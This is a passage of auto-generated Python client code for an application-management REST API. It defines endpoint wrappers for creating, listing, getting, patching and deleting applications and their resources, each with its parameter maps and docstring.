],
'required': [
'body',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'body':
(V1alpha1Application,),
'upsert':
(bool,),
'validate':
(bool,),
},
'attribute_map': {
'upsert': 'upsert',
'validate': 'validate',
},
'location_map': {
'body': 'body',
'upsert': 'query',
'validate': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__application_service_create
)
def __application_service_delete(
self,
name,
**kwargs
):
"""Delete deletes an application # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_delete(name, async_req=True)
>>> result = thread.get()
Args:
name (str):
Keyword Args:
cascade (bool): [optional]
propagation_policy (str): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
bool, date, datetime, dict, float, int, list, str, none_type
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
return self.call_with_http_info(**kwargs)
self.application_service_delete = _Endpoint(
settings={
'response_type': (bool, date, datetime, dict, float, int, list, str, none_type,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}',
'operation_id': 'application_service_delete',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'name',
'cascade',
'propagation_policy',
],
'required': [
'name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'cascade':
(bool,),
'propagation_policy':
(str,),
},
'attribute_map': {
'name': 'name',
'cascade': 'cascade',
'propagation_policy': 'propagationPolicy',
},
'location_map': {
'name': 'path',
'cascade': 'query',
'propagation_policy': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_delete
)
def __application_service_delete_resource(
self,
name,
**kwargs
):
"""DeleteResource deletes a single application resource # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_delete_resource(name, async_req=True)
>>> result = thread.get()
Args:
name (str):
Keyword Args:
namespace (str): [optional]
resource_name (str): [optional]
version (str): [optional]
group (str): [optional]
kind (str): [optional]
force (bool): [optional]
orphan (bool): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
bool, date, datetime, dict, float, int, list, str, none_type
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
return self.call_with_http_info(**kwargs)
self.application_service_delete_resource = _Endpoint(
settings={
'response_type': (bool, date, datetime, dict, float, int, list, str, none_type,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/resource',
'operation_id': 'application_service_delete_resource',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'name',
'namespace',
'resource_name',
'version',
'group',
'kind',
'force',
'orphan',
],
'required': [
'name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'namespace':
(str,),
'resource_name':
(str,),
'version':
(str,),
'group':
(str,),
'kind':
(str,),
'force':
(bool,),
'orphan':
(bool,),
},
'attribute_map': {
'name': 'name',
'namespace': 'namespace',
'resource_name': 'resourceName',
'version': 'version',
'group': 'group',
'kind': 'kind',
'force': 'force',
'orphan': 'orphan',
},
'location_map': {
'name': 'path',
'namespace': 'query',
'resource_name': 'query',
'version': 'query',
'group': 'query',
'kind': 'query',
'force': 'query',
'orphan': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_delete_resource
)
def __application_service_get(
self,
name,
**kwargs
):
"""Get returns an application by name # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_get(name, async_req=True)
>>> result = thread.get()
Args:
name (str): the application's name
Keyword Args:
refresh (str): forces application reconciliation if set to true.. [optional]
project ([str]): the project names to restrict returned list applications.. [optional]
resource_version (str): when specified with a watch call, shows changes that occur after that particular version of a resource.. [optional]
selector (str): the selector to to restrict returned list to applications only with matched labels.. [optional]
repo (str): the repoURL to restrict returned list applications.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V1alpha1Application
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
return self.call_with_http_info(**kwargs)
self.application_service_get = _Endpoint(
settings={
'response_type': (V1alpha1Application,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}',
'operation_id': 'application_service_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'name',
'refresh',
'project',
'resource_version',
'selector',
'repo',
],
'required': [
'name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'refresh':
(str,),
'project':
([str],),
'resource_version':
(str,),
'selector':
(str,),
'repo':
(str,),
},
'attribute_map': {
'name': 'name',
'refresh': 'refresh',
'project': 'project',
'resource_version': 'resourceVersion',
'selector': 'selector',
'repo': 'repo',
},
'location_map': {
'name': 'path',
'refresh': 'query',
'project': 'query',
'resource_version': 'query',
'selector': 'query',
'repo': 'query',
},
'collection_format_map': {
'project': 'multi',
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_get
)
def __application_service_get_application_sync_windows(
self,
name,
**kwargs
):
"""Get returns sync windows of the application # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_get_application_sync_windows(name, async_req=True)
>>> result = thread.get()
Args:
name (str):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ApplicationApplicationSyncWindowsResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
return self.call_with_http_info(**kwargs)
self.application_service_get_application_sync_windows = _Endpoint(
settings={
'response_type': (ApplicationApplicationSyncWindowsResponse,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/syncwindows',
'operation_id': 'application_service_get_application_sync_windows',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'name',
],
'required': [
'name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
},
'attribute_map': {
'name': 'name',
},
'location_map': {
'name': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_get_application_sync_windows
)
def __application_service_get_manifests(
self,
name,
**kwargs
):
"""GetManifests returns application manifests # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_get_manifests(name, async_req=True)
>>> result = thread.get()
Args:
name (str):
Keyword Args:
revision (str): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
RepositoryManifestResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
return self.call_with_http_info(**kwargs)
self.application_service_get_manifests = _Endpoint(
settings={
'response_type': (RepositoryManifestResponse,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/manifests',
'operation_id': 'application_service_get_manifests',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'name',
'revision',
],
'required': [
'name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'revision':
(str,),
},
'attribute_map': {
'name': 'name',
'revision': 'revision',
},
'location_map': {
'name': 'path',
'revision': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_get_manifests
)
def __application_service_get_resource(
self,
name,
**kwargs
):
"""GetResource returns single application resource # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_get_resource(name, async_req=True)
>>> result = thread.get()
Args:
name (str):
Keyword Args:
namespace (str): [optional]
resource_name (str): [optional]
version (str): [optional]
group (str): [optional]
kind (str): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ApplicationApplicationResourceResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
return self.call_with_http_info(**kwargs)
self.application_service_get_resource = _Endpoint(
settings={
'response_type': (ApplicationApplicationResourceResponse,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/resource',
'operation_id': 'application_service_get_resource',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'name',
'namespace',
'resource_name',
'version',
'group',
'kind',
],
'required': [
'name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'namespace':
(str,),
'resource_name':
(str,),
'version':
(str,),
'group':
(str,),
'kind':
(str,),
},
'attribute_map': {
'name': 'name',
'namespace': 'namespace',
'resource_name': 'resourceName',
'version': 'version',
'group': 'group',
'kind': 'kind',
},
'location_map': {
'name': 'path',
'namespace': 'query',
'resource_name': 'query',
'version': 'query',
'group': 'query',
'kind': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_get_resource
)
def __application_service_list(
self,
**kwargs
):
"""List returns list of applications # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_list(async_req=True)
>>> result = thread.get()
Keyword Args:
name (str): the application's name.. [optional]
refresh (str): forces application reconciliation if set to true.. [optional]
project ([str]): the project names to restrict returned list applications.. [optional]
resource_version (str): when specified with a watch call, shows changes that occur after that particular version of a resource.. [optional]
selector (str): the selector to to restrict returned list to applications only with matched labels.. [optional]
repo (str): the repoURL to restrict returned list applications.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V1alpha1ApplicationList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.application_service_list = _Endpoint(
settings={
'response_type': (V1alpha1ApplicationList,),
'auth': [],
'endpoint_path': '/api/v1/applications',
'operation_id': 'application_service_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'name',
'refresh',
'project',
'resource_version',
'selector',
'repo',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'refresh':
(str,),
'project':
([str],),
'resource_version':
(str,),
'selector':
(str,),
'repo':
(str,),
},
'attribute_map': {
'name': 'name',
'refresh': 'refresh',
'project': 'project',
'resource_version': 'resourceVersion',
'selector': 'selector',
'repo': 'repo',
},
'location_map': {
'name': 'query',
'refresh': 'query',
'project': 'query',
'resource_version': 'query',
'selector': 'query',
'repo': 'query',
},
'collection_format_map': {
'project': 'multi',
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_list
)
def __application_service_list_resource_actions(
self,
name,
**kwargs
):
"""ListResourceActions returns list of resource actions # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_list_resource_actions(name, async_req=True)
>>> result = thread.get()
Args:
name (str):
Keyword Args:
namespace (str): [optional]
resource_name (str): [optional]
version (str): [optional]
group (str): [optional]
kind (str): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ApplicationResourceActionsListResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
return self.call_with_http_info(**kwargs)
self.application_service_list_resource_actions = _Endpoint(
settings={
'response_type': (ApplicationResourceActionsListResponse,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/resource/actions',
'operation_id': 'application_service_list_resource_actions',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'name',
'namespace',
'resource_name',
'version',
'group',
'kind',
],
'required': [
'name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'namespace':
(str,),
'resource_name':
(str,),
'version':
(str,),
'group':
(str,),
'kind':
(str,),
},
'attribute_map': {
'name': 'name',
'namespace': 'namespace',
'resource_name': 'resourceName',
'version': 'version',
'group': 'group',
'kind': 'kind',
},
'location_map': {
'name': 'path',
'namespace': 'query',
'resource_name': 'query',
'version': 'query',
'group': 'query',
'kind': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_list_resource_actions
)
def __application_service_list_resource_events(
self,
name,
**kwargs
):
"""ListResourceEvents returns a list of event resources # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_list_resource_events(name, async_req=True)
>>> result = thread.get()
Args:
name (str):
Keyword Args:
resource_namespace (str): [optional]
resource_name (str): [optional]
resource_uid (str): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V1EventList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
return self.call_with_http_info(**kwargs)
self.application_service_list_resource_events = _Endpoint(
settings={
'response_type': (V1EventList,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/events',
'operation_id': 'application_service_list_resource_events',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'name',
'resource_namespace',
'resource_name',
'resource_uid',
],
'required': [
'name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'resource_namespace':
(str,),
'resource_name':
(str,),
'resource_uid':
(str,),
},
'attribute_map': {
'name': 'name',
'resource_namespace': 'resourceNamespace',
'resource_name': 'resourceName',
'resource_uid': 'resourceUID',
},
'location_map': {
'name': 'path',
'resource_namespace': 'query',
'resource_name': 'query',
'resource_uid': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_list_resource_events
)
def __application_service_managed_resources(
self,
application_name,
**kwargs
):
"""ManagedResources returns list of managed resources # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_managed_resources(application_name, async_req=True)
>>> result = thread.get()
Args:
application_name (str):
Keyword Args:
namespace (str): [optional]
name (str): [optional]
version (str): [optional]
group (str): [optional]
kind (str): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ApplicationManagedResourcesResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['application_name'] = \
application_name
return self.call_with_http_info(**kwargs)
self.application_service_managed_resources = _Endpoint(
settings={
'response_type': (ApplicationManagedResourcesResponse,),
'auth': [],
'endpoint_path': '/api/v1/applications/{applicationName}/managed-resources',
'operation_id': 'application_service_managed_resources',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'application_name',
'namespace',
'name',
'version',
'group',
'kind',
],
'required': [
'application_name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'application_name':
(str,),
'namespace':
(str,),
'name':
(str,),
'version':
(str,),
'group':
(str,),
'kind':
(str,),
},
'attribute_map': {
'application_name': 'applicationName',
'namespace': 'namespace',
'name': 'name',
'version': 'version',
'group': 'group',
'kind': 'kind',
},
'location_map': {
'application_name': 'path',
'namespace': 'query',
'name': 'query',
'version': 'query',
'group': 'query',
'kind': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_managed_resources
)
def __application_service_patch(
self,
name,
body,
**kwargs
):
"""Patch patch an application # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_patch(name, body, async_req=True)
>>> result = thread.get()
Args:
name (str):
body (ApplicationApplicationPatchRequest):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V1alpha1Application
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
kwargs['body'] = \
body
return self.call_with_http_info(**kwargs)
self.application_service_patch = _Endpoint(
settings={
'response_type': (V1alpha1Application,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}',
'operation_id': 'application_service_patch',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'name',
'body',
],
'required': [
'name',
'body',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'body':
(ApplicationApplicationPatchRequest,),
},
'attribute_map': {
'name': 'name',
},
'location_map': {
'name': 'path',
'body': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__application_service_patch
)
def __application_service_patch_resource(
self,
name,
body,
**kwargs
):
"""PatchResource patch single application resource # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_patch_resource(name, body, async_req=True)
>>> result = thread.get()
Args:
name (str):
body (str):
Keyword Args:
namespace (str): [optional]
resource_name (str): [optional]
version (str): [optional]
group (str): [optional]
kind (str): [optional]
patch_type (str): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ApplicationApplicationResourceResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
kwargs['body'] = \
body
return self.call_with_http_info(**kwargs)
self.application_service_patch_resource = _Endpoint(
settings={
'response_type': (ApplicationApplicationResourceResponse,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/resource',
'operation_id': 'application_service_patch_resource',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'name',
'body',
'namespace',
'resource_name',
'version',
'group',
'kind',
'patch_type',
],
'required': [
'name',
'body',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'body':
(str,),
'namespace':
(str,),
'resource_name':
(str,),
'version':
(str,),
'group':
(str,),
'kind':
(str,),
'patch_type':
(str,),
},
'attribute_map': {
'name': 'name',
'namespace': 'namespace',
'resource_name': 'resourceName',
'version': 'version',
'group': 'group',
'kind': 'kind',
'patch_type': 'patchType',
},
'location_map': {
'name': 'path',
'body': 'body',
'namespace': 'query',
